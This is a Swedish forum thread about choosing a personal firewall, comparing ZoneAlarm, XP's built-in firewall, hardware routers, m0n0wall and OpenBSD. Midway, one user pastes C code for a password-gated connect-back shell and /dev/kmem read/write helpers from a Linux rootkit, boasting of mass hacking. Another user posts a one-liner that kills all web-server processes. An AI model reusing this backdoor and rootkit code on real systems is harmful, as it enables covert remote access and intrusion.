Håller på att explodera på ZoneAlarm eftersom det blockar/fuckar upp min anslutning hela tiden - trots att de program jag använder har "fulla rättigheter".

Har ni några förslag på bra (dvs hyggligt säkra) brandväggar av annat märke?

Vilket OS? Om du kör XP så finns det en inbyggd, som jag tycker är bättre än program.

Kör hellre en hårdvarubrandvägg...

Vilket OS? Om du kör XP så finns det en inbyggd, som jag tycker är bättre än program.

Ok, skall kolla den.

Kör hellre en hårdvarubrandvägg...

Vad kostar en sån?


Tack för tipsen

jag kör med både hårdvaru och mjukvarubrandvägg. Sen har man ju givetvis antivirus.. och kör Adaware regelbundet.

Jag har så gott som aldrig fått problem med virus och dyl.

Sen ser man alldeles för ofta att folk ej uppdaterar sina program, eller inte ställt in brandväggen rätt

En Firewall -router kostar allt ifrån 600-1500:-

Beroende på hur stor swich de ska va (antal TP kontakter), printserver, hastiget mm mm..

Kolla D-Link eller SMS

Marcus

Är det inte ganska onödigt med en hårdvarubrandvägg för en privatperson? Det är ju knappast någon som lägger tid på att haxxa en privatperson.

För att aktivera XPs brandvägg, vilket alla borde göra.

Start-menyn -> Inställningar -> Nätverksanslutningar -> Egenskaper på aktuell anslutning -> Avancerat -> "Skydda min dator...."

Är det inte ganska onödigt med en hårdvarubrandvägg för en privatperson? Det är ju knappast någon som lägger tid på att haxxa en privatperson.

Jodå. Du har ingen aning.

En hw-fw kostar som Pdaddy skrev, jag rekommenderar 3COM OfficeConnect.

Jodå. Du har ingen aning.


Jaså, visa mig något som säger att svensson inte skulle klara sig med en mjukvarubrandvägg.

Jaså, visa mig något som säger att svensson inte skulle klara sig med en mjukvarubrandvägg.

Klara sig kan man säkert göra, ALLA brandväggar är egentligen mjukvarubrandväggar (och all mjukvara är egentligen hårdvara). En mjukvarubrandvägg är oftast inte lika pålitlig som en hårdvarubrandvägg för medelsvensson, that's it. Vill du verkligen att jag ska gå in på detaljer? Känns onödigt... :)

Klara sig kan man säkert göra, ALLA brandväggar är egentligen mjukvarubrandväggar (och all mjukvara är egentligen hårdvara). En mjukvarubrandvägg är oftast inte lika pålitlig som en hårdvarubrandvägg för medelsvensson, that's it. Vill du verkligen att jag ska gå in på detaljer? Känns onödigt... :)

Ja, självklart är alla brandväggar mjukvarubrandväggar. Hårdvarubrandvägg heter ju egentligen allt så länge brandväggen är "extern". Och, nej en mjukvarubrandvägg är inte lika pålitlig, men duger utmärkt åt svensson. Om någon verkligen vill komma åt din dator, så lär den personen göra det oavsett om du har en mjuk eller hårdvaru-brandvägg.

Varför är det onödigt att gå in på detaljer? Vi kan gå in på OSI/TCP-layers om du så vill. Erkänn att du bara skrev det för att du trodde att jag inte visste något? :)

Rota fram en gammal P2a ett USB-minne (eller en diskett, fast inte lika coolt juh) och kör Clavister som du "köper" någonstans på nätet. :)

Ja, självklart är alla brandväggar mjukvarubrandväggar. Hårdvarubrandvägg heter ju egentligen allt så länge brandväggen är "extern". Och, nej en mjukvarubrandvägg är inte lika pålitlig, men duger utmärkt åt svensson. Om någon verkligen vill komma åt din dator, så lär den personen göra det oavsett om du har en mjuk eller hårdvaru-brandvägg.

Varför är det onödigt att gå in på detaljer? Vi kan gå in på OSI/TCP-layers om du så vill. Erkänn att du bara skrev det för att du trodde att jag inte visste något? :)

det handlar väl mycket om risk och vad man betalar för att minska en viss del av risken. (i detta fallet även funktionalitet). Risken att något händer med mjukvaru brandväggen är väl i många fall större än hårdvaru dito, ex användarstrul, trojan el likn som kan stänga av funktionen. Jag tycker 500-1000 kr är värt att betala för en viss riskminskning.

Ja, självklart är alla brandväggar mjukvarubrandväggar. Hårdvarubrandvägg heter ju egentligen allt så länge brandväggen är "extern". Och, nej en mjukvarubrandvägg är inte lika pålitlig, men duger utmärkt åt svensson. Om någon verkligen vill komma åt din dator, så lär den personen göra det oavsett om du har en mjuk eller hårdvaru-brandvägg.

Varför är det onödigt att gå in på detaljer? Vi kan gå in på OSI/TCP-layers om du så vill. Erkänn att du bara skrev det för att du trodde att jag inte visste något? :)

Nä, det handlar inte om det. Och det handlar verkligen inte om OSI-modellen eller TCP-layers. Jag har ingen aning om hur mycket du kan, men om du varit inne i scenen ett tag skulle du med allra största säkerhet vara medveten om alla icke-publika maskar och all masshacking som förekommer, och den drabbar ju ingen annan än medelsvensson, med eller utan SP2-firewallen.

Ett exempel på det är pseudo-transparenta connect-back bindshells. Jag kan paste'a lite exempel-kod på en sådan som vi kodat här nedan:

void connect_back(ulong ip, ushort port)
{
int sock;
struct sockaddr_in cli;
int pid;

pid = _fork();
if (pid == -1) return;
if (pid == 0) {
char auth[256];
sock = _socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) _exit(0);

bzero((char *) &cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr = ip;
cli.sin_port = port;
if (_connect(sock, (struct sockaddr *) &cli,
sizeof(cli)) < 0) {
close(sock);
_exit(0);
}
/* uhm ... how simple ;) */
if (read(sock, auth, sizeof(auth)) <= 0) {
close(sock);
_exit(0);
}
if (strcmp(auth, PASSWORD) != 0) {
close(sock);
_exit(0);
}
fork_shell(sock);
close(sock);
_exit(0);
}
}

Har du sysslat något med raw sockets i SysV/POSIX eller Win32-API? Lite förenklat handlar det om att man inte behöver en lyssnande daemon på en specifik port för att ansluta till någons dator, så även om du har DROP/DENY/REJECT/TREJECT eller liknande som policy på scriptkiddiens evil-backdoor.c kan han ansluta till din dator genom ett connectback-skal. En metod är att infektera en existerande demon, eller som vi gjorde i vårt första rootkit som utnyttjade den här metoden infekterade vi /dev/kmem som är det dynamiska stället för Linux-kernelns minne. Med ett syscall som heter kmalloc() (egentligen ett interface till malloc()) kan man åstadkomma detta, men vi skrev egna funktioner:

static inline int rkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (read(fd, buf, size) != size) return 0;
return size;
}

static inline int wkm(int fd, int offset, void *buf, int size)
{
if (lseek(fd, offset, 0) != offset) return 0;
if (write(fd, buf, size) != size) return 0;
return size;
}

Du kan läsa lite mer om det här i artikeln som sd (en mycket skillad tjeck som jag har tillbringat veckor med i delade screen-sessions) och devik (en annan MYCKET skillad kille från tjeckien som även kodat QoS/HTB i Linux 2.4.x och 2.6.x) skrev i phrack magazine ungefär när koden släpptes om du är intresserad...

bolio: det där var för avancerat för mig :) Jag kan inget om sånt, är bara en simpel nätverkstekniker.

bolio: det där var för avancerat för mig :) Jag kan inget om sånt, är bara en simpel nätverkstekniker.

Cool, vad för sorts nätverk? Säg inte Winbl0ws bara. :P

Cool, vad för sorts nätverk? Säg inte Winbl0ws bara. :P

Ok, då säger jag inget :) Har glömt bort allt vad unix heter. "ls" är typ det jag kommer ihåg.

Ok, då säger jag inget :) Har glömt bort allt vad unix heter. "ls" är typ det jag kommer ihåg.

:P

Ok, då säger jag inget :) Har glömt bort allt vad unix heter. "ls" är typ det jag kommer ihåg.
Kan lära dig ett till som kan vara bra som nätverkstekniker
ifconfig

:laugh:

Kan lära dig ett till som kan vara bra som nätverkstekniker
ifconfig

:laugh:

-a :rolleyes:

yankee@kolozzeum ~$ for i in $(ps auxwww|grep -i 'httpd'|awk '{print $2}'); do kill -s SIGKILL $i;done

:/

yankee@kolozzeum ~$ for i in $(ps auxwww|grep -i 'httpd'|awk '{print $2}'); do kill -s SIGKILL $i;done

:/

Och det betyder? :)

Och det betyder? :)

OMG! Yankee just killed kolozzeum! You bastard!
:)

hmm jag har en router av märkte Netgear som ja funderar på att koppla in igen (fick ett nytt modem med 4 uttag så ja "slapp" använda routern), men bör det då finnas program på skivan som följde med routern? eller kan man tanka program till det?

Vilket OS? Om du kör XP så finns det en inbyggd, som jag tycker är bättre än program.

Den inbyggda brandväggen i XP är inte så värst svår att ta sig förbi.

hmm jag har en router av märkte Netgear som ja funderar på att koppla in igen (fick ett nytt modem med 4 uttag så ja "slapp" använda routern), men bör det då finnas program på skivan som följde med routern? eller kan man tanka program till det?

Tittar du i manualen till routern står det troligtvis att du ska sätta den interna datorns ip till 192.168.1.x (x ej 1 om routern har det) eller något sådant. Då ska du kunna surfa in på routern med adress 192.168.1.1 eller liknande och kunna konfigurera upp den mha ett webinterface.

Den inbyggda brandväggen i XP är inte så värst svår att ta sig förbi.

Det handlar inte det. Läs tråden igen.

Sätt upp en gammal 486:a med 2 nätverkskort och sug ner m0n0wall på den. En gratis och väldigt lättanvänd brandvägg. Känner du dig lite mer avancerad så kasta in OpenBSD. Rätt konfigurerad så stoppar den det mesta. Gratis den med.. :)

http://m0n0.ch/wall/

Den inbyggda brandväggen i XP är inte så värst svår att ta sig förbi.

Inte? Hur tar man sig förbi den då?

Sätt upp en gammal 486:a med 2 nätverkskort och sug ner m0n0wall på den. En gratis och väldigt lättanvänd brandvägg. Känner du dig lite mer avancerad så kasta in OpenBSD. Rätt konfigurerad så stoppar den det mesta. Gratis den med.. :)

http://m0n0.ch/wall/

WideOpenBSD sucks! Theo De Raadt kan gärna dööö. Linux <3 <3 <3 netfilter <3 <3 <3. (förutom NAT-IRC-modulen som är fulkodad, men ändå).

Det handlar inte det. Läs tråden igen.

Jag menade bara att det inte var nåt bra förslag på en bra brandvägg i stället för ZA.

WideOpenBSD sucks! Theo De Raadt kan gärna dööö. Linux <3 <3 <3 netfilter <3 <3 <3. (förutom NAT-IRC-modulen som är fulkodad, men ändå).

Funkar bra tycker jag. Väldigt enkel att konfa iom Pf och tables.. men det är väl en fråga om smak och tycke I guess :)

Jag menade bara att det inte var nåt bra förslag på en bra brandvägg i stället för ZA.

Varför inte?

Varför inte?

Jag garanterar dig att han inte har en aning om vad han snackar om. Take my word for it.

Jag garanterar dig att han inte har en aning om vad han snackar om. Take my word for it.

Därför jag vill höra hans argument :)